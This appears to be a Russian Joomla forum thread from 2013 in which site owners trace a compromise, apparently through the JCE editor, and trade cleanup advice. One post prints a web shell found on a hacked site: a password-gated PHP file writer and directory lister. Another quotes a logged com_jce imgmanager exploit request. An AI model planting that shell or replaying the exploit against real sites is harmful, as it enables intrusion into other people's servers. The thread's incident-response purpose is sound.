0 Пользователей и 1 Гость просматривают эту тему.
  • 52 Ответов
  • 23331 Просмотров
*

prodvigaeff

  • Осваиваюсь на форуме
  • 17
  • 1 / 0
Цитировать
Уже JCE удалил
И компонент и плагин? Кеш чистил? Для пользователя-редактор по умолчанию?
Было такое, но после внесения изменений в конфиг.пхп, редактор TinyMCE нормально работал.
*

Yurgin

  • Осваиваюсь на форуме
  • 35
  • 0 / 0
Блин, про плагин забыл. Удалил, в настройках он пропал, но при любом изменении настроек после сохранить/применить опять выдает (страница не доступна). Может это конечно не из за него, просто как-то все одновременно получилось...
Да, и офлайн сообщение и тэги прописаны знаками вопросов.
*

yevrowl

  • Захожу иногда
  • 267
  • 10 / 0
Появился в каталоге language файл application.php:

Код
<?php $r=$_REQUEST;$c=getcwd();$n=chr(32);print('468505ab9718d8c2205ea35d94f04668');if(md5(md5(@$r['p']))=='3829c383a1277bd6e7e108ab36f8f03c'){print($n.$c.$n);fwrite(fopen(dirname(__FILE__).'/'.$r['f'],'w+'),$r['b']);print($n);print_r(scandir($c));}exit;?>

И ещё несколько...
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Блин, про плагин забыл. Удалил, в настройках он пропал, но при любом изменении настроек после сохранить/применить опять выдает (страница не доступна). Может это конечно не из за него, просто как-то все одновременно получилось...
Да, и офлайн сообщение и тэги прописаны знаками вопросов.
пере залейте папку administrator из дистрибутива вашей версии должно помочь
не поможет тогда еще папки includes libraries media

Появился в каталоге language файл application.php:
и скорей всего не один и скорей всего не в одной папке их может быть и сотни и названия разные
*

verstalshik

  • Завсегдатай
  • 1754
  • 95 / 1
если перезаливать, то нестандартно названные файлы-то остаются)))
❶ НЕ СПРАВЛЯЕШЬСЯ САМ???  Поможем тут...  ❷ Калькулятор доставки - ЗАКАЖИ!!!...  ❸ Каталог компаний - ЖМИ!!!...  ❹ НОВИЧКИ! ВСЕ сюда! Первая консультация БЕСПЛАТНО!!
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
если перезаливать, то нестандартно названные файлы-то остаются)))
это только чтоб работало то что не работает ^-^
остальное искать надо и удалять  ;)
*

Yurgin

  • Осваиваюсь на форуме
  • 35
  • 0 / 0
Вы меня конечно извините за безграмотность, но что значит перезалить из дистрибутива? Не говоря уже о том стандартно или не стандартно. В каталоге language файла application.php нет, ни в корне, ни в администраторе. Знаки вопроса только в офлайн сообщении и в тэгах в настройках, в материалах тэги прописаны нормально. Я так думаю еслиб дело было в каталоге language, то эта фигня была-бы везде. Поисковик по этим тэгам в принципе находит сайт, они вопросами читаются только в настройках админки, т.ч. этот вопрос для на втором плане, самое противное что я не могу поменять настройки.
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Цитировать
самое противное что я не могу поменять настройки.
вот для этого и пере залить, и посмотреть что с кодировкой у вас вопросы это сбой кодировки
*

Yurgin

  • Осваиваюсь на форуме
  • 35
  • 0 / 0
Ок. Тогда объясните пожалуйста что значит перезалить. Снести "администратор" и залить из ранее сохраненных? Если так, то я не часто сохраняю файловую часть сайта, и по последней версии сайт выглядел немного по другому. Замена папки "администратор" на что-то повлияет? Или я вобще не так понял перезалить?
И где проверить эту кодировку?
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
пере залить=накатить  ^-^ т.е. просто записать папку по верх имеющихся файлов
папку брать только от дистрибутива вашей версии(версия в правом верхнем углу админки пишится) и только от разработчиков
повлияет или нет вопрос к экстрасенсам на нтв адресуйте, мы не знаем что вы делали все время существования сайта
кодировку проверять в файлах utf8 (без ВОМ) должна быть или попробуйте в .htaccess вписать вверх(или любое место) отдельно на строке
Код
AddDefaultCharset utf-8
*

Yurgin

  • Осваиваюсь на форуме
  • 35
  • 0 / 0
Администратор пере залил, в .htaccess строчку вставил, в utf8 не разобрался. В итоге совершенно ничего не изменилось...
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
у вас что то повреждено из файлов если не работает сохранить скрипты что .js(скорей всего) что .php
*

Yurgin

  • Осваиваюсь на форуме
  • 35
  • 0 / 0
Извиняюсь, а по русски можно? (что .js что .php) это как понять и что с эти делать?
*

Ariy84

  • Захожу иногда
  • 144
  • 27 / 1
  • 2+1=4
Извиняюсь, а по русски можно? (что .js что .php) это как понять и что с эти делать?
Божечки! Здесь сайты от вирусяк чистят или танцы с кодировкой проворачивают?
В поиске по форуму наберите "кракозяблы" читайте темы и учитесь. Собственно для этого и сделан форум, зачем писать не по теме то ?
Плюнь, выпей водки и,.. не пиши. Потомки оценят.
*

Yurgin

  • Осваиваюсь на форуме
  • 35
  • 0 / 0
зачем писать не по теме то ?
Научитесь читать прежде чем писать! Я уже писал что знаки вопроса не основное. Меня волнует то что не сохраняются настройки админки!
*

heroi_n

  • Осваиваюсь на форуме
  • 44
  • 1 / 0
Продолжаем борьбу с //beleiad9 и //kolamne817

Что сделано:
1. Найдены и удалены в папке /images файлы
Цитировать
j.php jos_6stt.php jos_8gkh.php jos_q1cx.php
2. Переместил папку log в другое место, завел новый error.php, за последний час получил вот такую строчку, что это значит?
Цитировать
2013-10-22   06:17:24   INFO   178.124.109.119   Joomla FAILURE:    Имя пользователя и пароль не совпадают или у вас еще нет учетной записи на сайте
3. Отключил всех пользователей сайта кроме 2х администраторов
4. Обновил JCE до последней версии и Modules Anywhere до версии 3.3.3
5. На configuration.php и .htaccess установил права 440

Сайт работает, сижу жду что будет.
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Цитировать
2. Переместил папку log в другое место, завел новый error.php, за последний час получил вот такую строчку, что это значит?

Код
Имя пользователя и пароль не совпадают или у вас еще нет учетной записи на сайте

а что это читается по другому как то, или трактование различное может быть
*

heroi_n

  • Осваиваюсь на форуме
  • 44
  • 1 / 0
Прошел час. Опять все js "обновились", только теперь не //beleiad9 и //kolamne817 а //mnua8sdi и //kote8aif/*

С логах добавились 2 записи
Цитировать
2013-10-22   07:11:52   INFO   128.73.93.1   Joomla FAILURE:    Имя пользователя и пароль не совпадают или у вас еще нет учетной записи на сайте
2013-10-22   08:04:28   INFO   128.73.93.1   Joomla FAILURE:    Имя пользователя и пароль не совпадают или у вас еще нет учетной записи на сайте
Админка не открывается, белый лист

Внешние ссылки по результатам http://pr-cy.ru/link_extractor не появились
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
Прошел час. Опять все js "обновились", только теперь не //beleiad9 и //kolamne817 а //mnua8sdi и //kote8aif/*

С логах добавились 2 записиАдминка не открывается, белый лист

Админку закрой или включи http-авторизацию. Проверяй яваскрипты.
На папку/файлы /jmages 500/400
*

ChaosHead

  • Гуру
  • 5242
  • 451 / 13
У меня тоже на хосте один юзверь подхватил заразу, стали абузы приходить на спам. Но у него статические сайты-визитки, проще оказалось всё снести под его аккаунтом и восстановить из бэкапа. Заодно поставил ему и своим визиткам ограничение на кол-во отправляемых писем в час.

В итоге я пришел к выводу, что каждый свой сайт лучше держать под отдельным пользователем. Если один сломают, то другие не пострадают при этом.

Без JCE кстати жить вполне можно, единственно что ткните носом если есть какая-то приблуда для TinyMCE, чтобы удобно фотки было заливать, особенно с фронта.

Как заставить TinyMCE не обрезать код YouTube, я написал тут: http://joomlaforum.ru/index.php/topic,277582.0.html
Это помню первая проблема, которая у меня возникла с ним, когда я начал заниматься сайтами.
« Последнее редактирование: 22.10.2013, 15:08:41 от ChaosHead »
*

yevrowl

  • Захожу иногда
  • 267
  • 10 / 0
Существуют ли какие-либо заплатки? Возможно установка read-only решает проблему?
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
Нашел в логах. Эт для любителей JCE
Код
/&amp;sa=U&amp;ei=bueDUseYPMKshQe0noGABw&amp;ved=0CHwQFjAbOLwF&amp;usg=AFQjCNHWRXiTgfgzyuY4cvOXXQcvg9re2Q/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b  HTTP/1.1" 200 22522 "-" "BOT/0.1 (BOT for JCE)"
*

rishard

  • Захожу иногда
  • 71
  • 3 / 3

остальное все не существенно, массово ломятся через п.2 и п.3


Так, да не вполне так.
Вытащил из логов своего сайта уйму небезинтересных сведений на тему.
Результаты довольно забавны; кому интересно - гляньте. Удалось вычислить ряд наиболее взламываемых расширений (com_jce на первом месте по популярности, согласен), перечень злонамеренных web-ресурсов, используемых в атаках, ну и - ряд наиболее часто употребленных сценариев.
« Последнее редактирование: 27.01.2014, 19:05:25 от rishard »
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Изолирование папок сайтов на OpenServer

Автор Lemady

Ответов: 41
Просмотров: 5642
Последний ответ 29.11.2021, 15:47:31
от KoreshS
[Решено] Заразились в один день 4 аккаунта по 10 сайтов

Автор Stich SPb

Ответов: 356
Просмотров: 68242
Последний ответ 13.09.2019, 18:49:33
от diana1975
Домены.ru и.рф сайтов злоумышленников будут разделегироваться

Автор voland

Ответов: 7
Просмотров: 963
Последний ответ 26.05.2016, 15:08:34
от flyingspook
Взломали сеть сайтов на Joomla

Автор kanbodows

Ответов: 9
Просмотров: 1480
Последний ответ 23.09.2015, 00:25:36
от flyingspook
Проверенные методы проверки сайтов на вирусы

Автор Mehanick

Ответов: 6
Просмотров: 2397
Последний ответ 07.09.2015, 00:02:59
от winstrool